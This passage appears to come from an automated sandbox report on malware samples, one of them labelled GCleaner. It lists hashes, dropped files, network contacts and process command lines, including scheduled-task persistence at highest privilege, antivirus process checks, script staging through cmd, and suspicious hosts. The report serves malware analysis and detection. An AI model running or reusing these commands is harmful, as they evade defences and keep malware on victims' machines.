US 151.101.129.91:443 addons.mozilla.org tcp
US 151.101.129.91:443 addons.mozilla.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 172.217.16.227:80 o.pki.goog tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 api4.check-data.xyz udp
US 35.162.118.53:80 api4.check-data.xyz tcp

Files

\Users\Admin\AppData\Local\Temp\7zSEDA9.tmp\Install.exe

MD5 3b76af9e2510171d3739b8bc9ee2ee68
SHA1 4c8148a587ba7e6de8963c2d4dbbcceac39b3694
SHA256 3c888be794010977e28034fd484ed7363ff6c52dfe6c8449acbe6cce4e637768
SHA512 d9736ae8439c7d809cdd299423f8ac04f6301c4eb3c1997fa217b4e8cd77174f795d1632b23f6e8a93eb6c96b998a8258f2366b3d701a7a2b944cab83a3a8d94

\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe

MD5 ad10a30760d467dade24f430b558b465
SHA1 7aaa56e80264c27d080c3b77055294593eacca1b
SHA256 44c717fd08281b16f266bd9bc037fc16713a8ac02e1dfe519ba3be49bac8442a
SHA512 23c13f8c865da24d848b2843b67190188048e7383dcb2dff10f8e8e94862a8ae1916aef3566cd2ce4346c816f7e8301912a9fff4a04bb5380b75b98bd7154e63

memory/2732-22-0x0000000010000000-0x0000000010F04000-memory.dmp

memory/3068-31-0x0000000001F70000-0x0000000001F78000-memory.dmp

memory/3068-30-0x000000001B690000-0x000000001B972000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 578519ff0aeebcd0c245c67ac82f6fad
SHA1 5ca23ab2a1ac94e88bc5075add6968d91c32daa8
SHA256 d624cccc99bbeee39e3b98ad5c77ffa0ce510972ddeeb78d86161fccb7f9c5cc
SHA512 4b8a73dfe9b9a52aee2f8cb57bada64d8d760f1745eaa1cc5589d8da283dea2b2b93618684958a5ef1a849ffeef6296528776a7538892a822e0601bdf88652ef

memory/1940-49-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

memory/1940-48-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 0132f4d978109689c0fae10d78a4fa27
SHA1 446e28c29faa0aec1631b99d7c14719caaca8d55
SHA256 889a97e4f5eab7aeab2ef37e6c267fc4a067bd500296a6724cac6afb390ee990
SHA512 a941ae3c57b7f6563f96b2de3ed8481c3ab9f7f93f1d6f58af52e4afca7cf02893092a36e93c79b1432aa2c1c5841f58e535b11aa722ec38ab7f4ab9ff575d0c

memory/1668-60-0x000000001B670000-0x000000001B952000-memory.dmp

memory/1668-61-0x0000000002240000-0x0000000002248000-memory.dmp

C:\Windows\Temp\biwNYXhGTKCQxjLv\hfwsOKJx\FcAhvhVUcyKlmmgL.wsf

MD5 06d50465eef37ad01e0fbf99be7e785f
SHA1 4573c38949ead42184626b48d306ec596e506410
SHA256 5e6195cd87ce3f869a435348a234eb38b84a5f7317fb891e29c6bf51c8d864c4
SHA512 42338a010e2e323e38d54d0f37c47147d375ae12538a51f4f7747d83cb43df8f4f572ed524386a9b24ab9eba593316253a7229e0a0c7edd39cbe12720762c42b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 6f942021440de85f88392a82857f8d14
SHA1 24420f3ecbb242799ea4a698b59cf90f6d1eb2c3
SHA256 df79592876395e683e19ad55d76e42120fdd16d32a9f537a714fd1e162d1d174
SHA512 aa25c2b368ed99cb6be51f068afd0b730c8a66880e154b3f58cef9dfb71178e440920c0c1294b7806190ef4d21c06821120a441074d40f31d6d9313c9d46fd28

memory/596-87-0x00000000032A0000-0x0000000003325000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 f540d2c0df415904e1d224218a69eb50
SHA1 5da85671d3c3584f162d12893354a350ff7d652b
SHA256 0409055fe42c39c5a6d6d6509c4f4f8988776f309e6981f1d600051ac714c4a1
SHA512 a661d754fbb4bbd00695b02440a3a32ef2ce4bc5c51ecadda507409e460d8c6751d9f260b55daedf5bd6422984bc0ce4b690536a1c6abbbe862b0b0e89e678ab

memory/596-122-0x0000000003480000-0x00000000034EB000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 103efdadea8dc9131b76649cbba6bedf
SHA1 30d71efcf6b0935bde43f50f336d886a8a6b8585
SHA256 f7940488e3457006f40052a873db5f5d403d81b10d566a58a84eb95a5eb419ff
SHA512 f914fb73d4e2a469e54f9832b986738d12737d86687de41aae65add5fb3327a49d72653120c1d1f954d04981263259badf420cb017205c4f417bd4d07528675c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Program Files (x86)\oWxSecJNU\HhZjtHf.xml

MD5 059f06b3bb750b1426b76d4b977e7c3f
SHA1 0925fb38f7c878700417c9993050c621f3d6ee85
SHA256 ca55bba4606435fa393ec6ec4334ae9a9b2c41a6484323828494879bdf28505b
SHA512 45ea66ccdc63b95d68cf84dcecc3f7231c903d918117182826b4a0b5729a116773540801eff76356104ce2ebe80979fa30b43810dfa506785e780fd7ea09b4a0

C:\Program Files (x86)\YNUWFfCEdUiU2\jVrfOkL.xml

MD5 6013885b20e32a8828b6ea20b8fdb0e3
SHA1 7bab59dacd948d1dca87a95c7919bd3b3c4cdac9
SHA256 4ff16469d0c5f503a784609eb76b4db21d6de7b87568cec90c4b150d3b9caffb
SHA512 3fce1b7c6e2cb343f974d3b5d99c03d8311acb970f78c0adcf656a720c2f0b17f78af942273e25dc3a7dbfcc12c510900e5e1be8a1b8c4d11e75de5810e0d5e1

C:\ProgramData\eiYaNjTCbhfbMeVB\aiLEFzd.xml

MD5 4651a3c027611265c1c89fba63d6b8e6
SHA1 0d126dddb504e1f1cfa38ef21b792dbddc865f55
SHA256 84b2979ab8f4de51662cd2f29d1320b92ff674520b5f3ce23f9be850cfb9db31
SHA512 d5f5869d96f9baec02f28838899608fd4dd4bf034a1ee51d38c1aaa53c589cd6e8e6055664d25fa50e4315e972a50cf6e86345fa4f6f7e2960b288e4c387442c

C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\GZdYLkX.xml

MD5 1f86ca2721e12e3c6f9915f394218273
SHA1 cb7ce7abeeb9f59774659242c7ac41666ae9b6f6
SHA256 3b92b53184bd9a8c46bf9141692a684d8c2d297472cbb03b6c454d2138b20f75
SHA512 b04a3d5ffc5e91d05772ee2c00106a632c4eb3067b7184fad8a4b98ef478b150b8ef651a3de74cccf4de765320ebc6fa2cb25fda65230ba372359e260edc22a2

C:\Program Files (x86)\LsajhStaXkJRC\LvsQWsQ.xml

MD5 d7f0b44068b1a5e5f2e1bfbe7b51742d
SHA1 df757eb235f89923b6302899dd68cb9cfef9e9ff
SHA256 c1f84ad3301c11563936fd14f0dc2144409e612df440cd2648dfee5099504b79
SHA512 5c99b77eb4f88a05c7db637e3faf41a586a1374c1507b909914dd67c05485c63cc63fc82b4f8662a0bc5ee5b7eeaa44f44264d271efaf8d304ec69f6f62500b6

C:\Windows\Temp\biwNYXhGTKCQxjLv\rtiJfjXF\tqthEWm.dll

MD5 617698f01c7cceb3b262a98ba4da5a98
SHA1 c9244abc65ab3c485cc197ddea5e846b65d14bad
SHA256 9c0b90664119447fee609a6a27f5d97affa2ae310bd9d1aa37e458c9819f1754
SHA512 3b713c0ff53a7f88f628a90b30d59417bf5b92216666e4bd2f4c1cd502f338a1838c9691d5ee2830015b5f697ca811ee8e976d026c0d073b1487fb573b50a400

memory/596-305-0x0000000004A50000-0x0000000004B0D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1009pdhg.default-release\prefs.js

MD5 7e1d40cfcbf422515e7ebea025104a1e
SHA1 58ce283f0ae2cdb98e002bec56b678465bed9979
SHA256 1754c8e48374a911afbbc0f91e0d2cdd6f6d469afaa1c2b20c8ca9ff5370e4ea
SHA512 288a9a3977a4eb7a117a44f1137e12d32a7c5d6e6131276e07b334995b69778e6f4bd67587efa29e784b8f364cbf7052f8096de99999b1def62e504c0ec2e6d3

memory/596-291-0x0000000003720000-0x0000000003793000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 323206751e0a12e1797c91034bc1f8e4
SHA1 46ddc443c111fa9c2fc4dd65e310cfd817490067
SHA256 2e773f8a36cf95f9b9fee3b1eba765df147177788dd2ad631fd33cd79f103c0f
SHA512 5030c85c35c412c660ddd367ca65f2133542bb3b6e09f972581a5d2e8ad49a4f74901dd5ab9f6a26660388149d9a2b6950491224280c4c8fa6f420c54d9107b9

memory/1496-324-0x0000000001060000-0x0000000001F64000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Service.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Service.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
FI 163.123.143.4:80 163.123.143.4 tcp
NL 107.182.129.251:80 107.182.129.251 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 softs-portal.com udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 4.143.123.163.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 251.129.182.107.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 12.143.123.163.in-addr.arpa udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 vipsofts.xyz udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 888 set thread context of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\at.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1632 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 1632 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 1632 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 1632 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3296 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1200 wrote to memory of 3336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 3336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 3336 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 1664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 1664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 1664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1200 wrote to memory of 4264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 4264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 4264 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1200 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1200 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1200 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1200 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1200 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1200 wrote to memory of 888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1200 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1200 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1200 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3296 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3296 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3296 wrote to memory of 64 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 888 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 888 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe"

C:\Windows\SysWOW64\at.exe

at 3874982763784yhwgdfg78234789s42809374918uf

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Film.aspx & ping -n 5 localhost

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq AvastUI.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "avastui.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq AVGUI.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "avgui.exe"

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^otPcqYaF$" Deliver.aspx

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Tanks.exe.pif A

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 bDIATguLPNddTCYKKaxjQJVwvtXO.bDIATguLPNddTCYKKaxjQJVwvtXO udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Film.aspx

MD5 8eb593f08a4cca9959a469af6528ac0d
SHA1 8f4ae3c90b6d653eb75224683358f12dfc442dca
SHA256 7903967eca6727d611e46d666d2871d4438e9bc65ea185e01787c8a8a3e5ce70
SHA512 631403ca6e37a317158ba583e5b0f05e83157abc4cb4865f8d0d8f6e11ef39ab150fe948961aebcaff5c01ace0345ca6dc3882306ab0ce84eec6c1dfdf822ca9

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Deliver.aspx

MD5 701381da8e4a87f18a22b98eee09a22b
SHA1 f5ff5c1714155b853a8335b1d359a010c012c596
SHA256 8b21bc4f93cc9a8438ec08d1385f2d7dead6291a741fdfe7b6960c9f9917f6b3
SHA512 55ef35ce31c1fac2ff91efb3b4a5f646f3cfc7a0c4592f9da3e444a6472203608e224cf55dfa5c79025247c41aa8cbad759ef65dee9f95fe5c244dee239dc141

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Accurate.aspx

MD5 ffc713ff8173dac3c96bc583eb916705
SHA1 3c1b3e1eb258e304722ecc876820a470d491467d
SHA256 8d9c5d3eb7d4bfeb8ab1c5f4dde38dea52624ed80b188648fbab2ada88505ae4
SHA512 8af86a88e0bb60941ec5a55678c97f9a25518f2e140fc2e792115cb653b5f5a745630d970492565944116f3c5e5dc053c22b60ad8287ce5b921e47371125bc8f

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

MD5 6987e4cd3f256462f422326a7ef115b9
SHA1 71672a495b4603ecfec40a65254cb3ba8766bbe0
SHA256 3e26723394ade92f8163b5643960189cb07358b0f96529a477d37176d68aa0a0
SHA512 4b1d7f7ffee39a2d65504767beeddd4c3374807a93889b14e7e73db11e478492dec349aedca03ce828f21a66bb666a68d3735443f4249556e10825a4cd7dfeb4

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xEvsgieS.dll

MD5 4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1 e16506f662dc92023bf82def1d621497c8ab5890
SHA256 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA512 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

memory/116-26-0x0000000000400000-0x0000000000435000-memory.dmp

memory/116-33-0x0000000000400000-0x0000000000435000-memory.dmp

memory/888-34-0x0000000000220000-0x000000000030B000-memory.dmp

memory/116-35-0x0000000000220000-0x000000000030B000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240729-en

Max time kernel

140s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A

